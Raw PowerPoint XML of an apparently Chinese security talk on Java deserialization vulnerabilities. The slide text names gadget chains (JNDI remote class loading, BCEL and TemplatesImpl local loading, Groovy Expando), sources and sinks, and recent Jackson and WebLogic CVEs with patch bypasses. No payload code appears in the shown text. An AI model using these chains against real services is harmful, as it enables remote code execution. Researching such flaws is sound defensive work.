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62" r:id="rId4"/>
    <p:sldId id="311" r:id="rId5"/>
    <p:sldId id="285" r:id="rId6"/>
    <p:sldId id="287" r:id="rId7"/>
    <p:sldId id="263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12" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="299" r:id="rId20"/>
    <p:sldId id="300" r:id="rId21"/>
    <p:sldId id="301" r:id="rId22"/>
    <p:sldId id="303" r:id="rId23"/>
    <p:sldId id="304" r:id="rId24"/>
    <p:sldId id="305" r:id="rId25"/>
    <p:sldId id="306" r:id="rId26"/>
    <p:sldId id="308" r:id="rId27"/>
    <p:sldId id="309" r:id="rId28"/>
    <p:sldId id="310" r:id="rId29"/>
    <p:sldId id="314" r:id="rId30"/>
    <p:sldId id="313" r:id="rId31"/>
    <p:sldId id="282" r:id="rId3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3B695-4F2D-4234-AE94-7CC16C60BF80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672F53-4754-4D2C-97F6-1421099385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04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672F53-4754-4D2C-97F6-14210993859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9010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72F53-4754-4D2C-97F6-14210993859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567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672F53-4754-4D2C-97F6-14210993859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879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2020/4/10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655442"/>
            <a:ext cx="12192000" cy="202557"/>
            <a:chOff x="0" y="1371600"/>
            <a:chExt cx="12192000" cy="1371600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1524000" y="1371600"/>
              <a:ext cx="1524000" cy="137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00" y="1371600"/>
              <a:ext cx="1524000" cy="137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0" y="1371600"/>
              <a:ext cx="15240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371600"/>
              <a:ext cx="1524000" cy="137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1371600"/>
              <a:ext cx="1524000" cy="1371600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1371600"/>
              <a:ext cx="15240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0000" y="1371600"/>
              <a:ext cx="1524000" cy="137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00" y="1371600"/>
              <a:ext cx="15240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2" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4842297" y="-16913"/>
            <a:ext cx="2507406" cy="1192788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" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1074656" y="3001729"/>
            <a:ext cx="992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Java</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US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反序列化组件安全问题分享</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="54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906963" y="5065040"/>
            <a:ext cx="2378074" cy="436246"/>
            <a:chOff x="4929134" y="3536850"/>
            <a:chExt cx="1783556" cy="327184"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="圆角矩形 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4929134" y="3536850"/>
              <a:ext cx="1783556" cy="327184"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect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335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08806" y="3559475"/>
              <a:ext cx="624209" cy="2845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865" dirty="0" err="1">
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>afanti</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1865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远程加载恶意类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Jndi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-Field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CA3A68-8B03-40C7-9D06-B3645981D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05" y="1169719"/>
            <a:ext cx="7972425" cy="30194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80F449C-C46A-463B-B208-60F48D93D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60" y="4860096"/>
            <a:ext cx="7962900" cy="15621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6A7C0A1-FE1D-4062-9CEC-89B68E0DF6E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639205" y="4332306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反序列化调用链如下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23731081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远程加载恶意类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Jndi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-Field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sz="1800" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Poc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>构造如下：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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C717BE-7C4C-4E49-97CD-FA7C9656E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815" y="1735327"/>
            <a:ext cx="4107161" cy="356253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94985FC-D6F0-4E68-9D55-8C37048E9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558" y="2118380"/>
            <a:ext cx="7768442" cy="303553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DA1A9D2-E655-4EFD-97FC-1168111919FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4395277" y="1257214"/>
            <a:ext cx="769255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dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>集合中有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DefaultBeanFactoryPointcutAdvisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类进一步调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>equals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法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52886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远程加载恶意类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Jndi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-Field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25FB282-305C-4F9E-9D37-F933AC7E4620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1322734" y="1091402"/>
            <a:ext cx="221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getAdvice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3C7E53D-BF45-4C26-A662-CA0B5E22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878" y="1460729"/>
            <a:ext cx="7472314" cy="294233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87C536-1507-4B63-BD33-3072ED40F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597" y="4431341"/>
            <a:ext cx="8315325" cy="11430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CAE8521-E01A-416C-854D-84BE52805E83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330309" y="4459782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D08D745-D402-4967-A9FA-FFE9B50F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0309" y="5602622"/>
            <a:ext cx="8153400" cy="1257300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42E54382-AC63-460A-B132-F66C1DD76AB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9646763" y="1505396"/>
            <a:ext cx="2306425" cy="4585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/>
              <a:t>一些隐藏方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>collection/map</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>toString,equals,hashcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>put</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>get,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>collection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>add,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>迭代对象的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Source:equals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Sink:jndi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1866060210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本地加载恶意类</a:t>
            </a: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、基于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Bcel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1C40BC1-23F2-4920-A550-F378EA735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80" y="1160292"/>
            <a:ext cx="8115300" cy="31813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5CC7232-3936-4980-A532-B2FC45C45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4" y="4844709"/>
            <a:ext cx="7810500" cy="143827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0029031-2455-4C7B-9B2A-D9057487ABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351934" y="4408509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POC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如下</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3607529069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本地加载恶意类</a:t>
            </a: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、基于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Bcel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FC7E84-087E-41DD-9A93-84164A3FB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" y="1492884"/>
            <a:ext cx="8153400" cy="7524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9DDB9B5-61FD-407A-AD81-890D54CEF915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238813" y="1169719"/>
            <a:ext cx="90419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setDriverClassLoader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赋值为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com.sun.org.apache.bcel.internal.util.ClassLoader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A8FE04B-B0B3-439B-8F6D-3E8E6738C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36" y="2779335"/>
            <a:ext cx="7772400" cy="167640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E5E4354-F999-4AF2-A532-9A21409B06CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238813" y="237830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setDriverClassName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赋值为可控的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bcel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编码 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E8F5760-2645-4FD9-8767-C30A0F655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934" y="4940220"/>
            <a:ext cx="7991475" cy="24765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7F5EB86-1E74-429F-8632-346A61C7CF32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238813" y="45708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来到漏洞触发点，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getConnection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9FFC41A-245C-4297-9597-ACC15033F4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934" y="5796423"/>
            <a:ext cx="7172325" cy="3524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F26CE20B-82E5-4D23-AB25-6FFF8123173D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218014" y="5303023"/>
            <a:ext cx="30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调用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createDataSource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5097460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本地加载恶意类</a:t>
            </a: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、基于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Bcel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DB9B5-61FD-407A-AD81-890D54CEF915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238813" y="1169719"/>
            <a:ext cx="2855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最后来到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Class.forName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()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8AEBAB0-36DA-41D3-8C50-B7BB0F1CF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934" y="1592531"/>
            <a:ext cx="7429500" cy="40957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485C84B5-BA01-4027-8554-C08E07698CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8185609" y="1980032"/>
            <a:ext cx="376757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Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>com.sun.org.apache.bcel.internal.util.ClassLoader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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Sink:set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get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方法触发，利用静态代码块，实例化恶意类触发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RCE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另一个本地加载恶意类的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl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Sink: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用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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newInstance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生成一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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实例，所以将恶意代码写进构造函数当中。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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83081186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Sink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是反射方法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207426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DB9B5-61FD-407A-AD81-890D54CEF915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="170815" y="566242"/>
            <a:ext cx="667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POC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6ADC450-BE22-4A0A-98DC-1D2C80BE5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4" y="641658"/>
            <a:ext cx="7024001" cy="245540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8AC0F89-D24C-4419-9948-3F5F50A0D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10" y="3700560"/>
            <a:ext cx="8181975" cy="1266825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BBAAEE98-A8AD-4B1B-B8F8-9C19F85F08F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="170815" y="3264426"/>
            <a:ext cx="62563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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Expando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>hashCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>方法，来到漏洞触发点，最终</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RCE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:b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6F8A456-BE5F-47F4-932F-EC946AE5DBB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351933" y="5525453"/>
            <a:ext cx="91502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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/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source:Expando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sink:clourse.call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()(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通过反射执行的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151682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最近一些新洞的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POC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207426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DB9B5-61FD-407A-AD81-890D54CEF915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="170815" y="566242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CVE-2019-12384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40774CA-0CA9-4867-857E-E970CE5F2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4083" y="566242"/>
            <a:ext cx="7858125" cy="86677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B7F726-9795-4B1F-A82D-B08C3D5E9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083" y="1530591"/>
            <a:ext cx="7658100" cy="186690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5415CD5-010E-4A48-A19F-00D442DC08FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="182746" y="3429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CVE-2019-14379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259DB34-C287-42D3-BD74-A00337EB4D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083" y="3560337"/>
            <a:ext cx="7696200" cy="103822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E6CDDAD-2F14-443B-B179-7E4761E2FAB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="282758" y="4894025"/>
            <a:ext cx="477996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CVE-2019-12086</a:t>
            </a:r>
          </a:p>
          <a:p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需要结合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mysql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client attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>8.0.14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>以下的版本的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>驱动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C47864F-15D3-4E0D-81C7-0E6B8314D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083" y="5026375"/>
            <a:ext cx="7905750" cy="66675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1E145B1A-1A80-4AF1-882E-5CD8B079F4AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300431" y="6305142"/>
            <a:ext cx="10408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总结：最近爆出来的洞，大都是通过寻找第三方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jar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包执行命令、存在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jndi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调用。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790270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CVE-2017-3506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DB9B5-61FD-407A-AD81-890D54CEF915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2020489" y="4256106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补丁信息：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84F609-1D4A-4404-87F7-DF225731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534" y="1169719"/>
            <a:ext cx="6229350" cy="294322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643E979-4FE2-4F81-B469-5BFD29987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621" y="4768600"/>
            <a:ext cx="75723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450748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CVE-2017-103252/CVE-2017-10271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DDB9B5-61FD-407A-AD81-890D54CEF915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295373" y="3244334"/>
            <a:ext cx="2172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void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属性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0D22C8-D80C-4268-AEF7-443A1CD6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0" y="1678056"/>
            <a:ext cx="5705475" cy="141922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0C7C2A2-87DF-4AD1-AB9B-84235504D47D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295373" y="1182677"/>
            <a:ext cx="3028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绕过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object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标签，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34564BE-EB26-47BD-86AC-298731413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351" y="3678066"/>
            <a:ext cx="6181725" cy="269557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FBC1D86-A7DC-41B2-A298-FF966BD2AD6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6640197" y="3429000"/>
            <a:ext cx="5551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补丁信息：禁用了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object,new,method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void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标签里除了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index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外不能有其他属性值，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array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标签，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属性值除了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byte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不能是别的，所以就不能自由调用类的静态函数了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2983722911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任意多边形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-118233" y="0"/>
            <a:ext cx="2837789" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2837789"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 537934 w 2837789"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 704850 w 2837789"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY4" fmla="*/ 395378 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 2618085 w 2837789"/>
              <a:gd name="connsiteY5" fmla="*/ 417526 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 1747634 w 2837789"/>
              <a:gd name="connsiteY6" fmla="*/ 1485534 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 2618085 w 2837789"/>
              <a:gd name="connsiteY7" fmla="*/ 2553542 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY8" fmla="*/ 2575690 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 2837789 w 2837789"/>
              <a:gd name="connsiteY9" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 704850 w 2837789"/>
              <a:gd name="connsiteY10" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 537934 w 2837789"/>
              <a:gd name="connsiteY11" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 0 w 2837789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37789" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="537934" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704850" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837789" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837789" y="395378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2618085" y="417526"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2121320" y="519179"/>
                  <a:pt x="1747634" y="958717"/>
                  <a:pt x="1747634" y="1485534"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1747634" y="2012352"/>
                  <a:pt x="2121320" y="2451889"/>
                  <a:pt x="2618085" y="2553542"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2837789" y="2575690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2837789" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704850" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53793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>
              <a:solidFill>
                <a:srgbClr val="0070C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527270" y="293248"/>
            <a:ext cx="2384573" cy="2384573"/>
            <a:chOff x="4240335" y="3008435"/>
            <a:chExt cx="3711332" cy="3711332"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="椭圆 4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7" name="椭圆 6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椭圆 7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762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 dirty="0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15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3770700" y="1203313"/>
            <a:ext cx="4239532" cy="70104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CONTENTS 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文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824612" y="1107597"/>
            <a:ext cx="1692445" cy="74358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zh-CN" alt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XLt" panose="020B0302020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="65000"/>
                  <a:lumOff val="35000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="ITC Avant Garde Std XLt"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3875927" y="1972516"/>
            <a:ext cx="4856297" cy="60959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3" name="组合 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4338665" y="2353700"/>
            <a:ext cx="6267394" cy="824262"/>
            <a:chOff x="4247964" y="2133922"/>
            <a:chExt cx="4921317" cy="647441"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004131" y="2279892"/>
              <a:ext cx="4165150" cy="39466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en-US" altLang="zh-CN" sz="266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2665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反序列化介绍及漏洞触发场景</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="圆角矩形​​ 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4247964" y="2133922"/>
              <a:ext cx="647740" cy="647441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 w="25400" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="BFBFBF"/>
              </a:solidFill>
              <a:round/>
            </a:ln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265">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4265">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill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26" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5013286" y="2501078"/>
              <a:ext cx="145055" cy="2659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endPara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2" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4333031" y="3577550"/>
            <a:ext cx="7037862" cy="824262"/>
            <a:chOff x="4247964" y="2133922"/>
            <a:chExt cx="5526307" cy="647441"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004131" y="2279892"/>
              <a:ext cx="4770140" cy="41098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en-US" altLang="zh-CN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Java</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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反序列化漏洞及</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US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挖掘思路</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="圆角矩形​​ 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
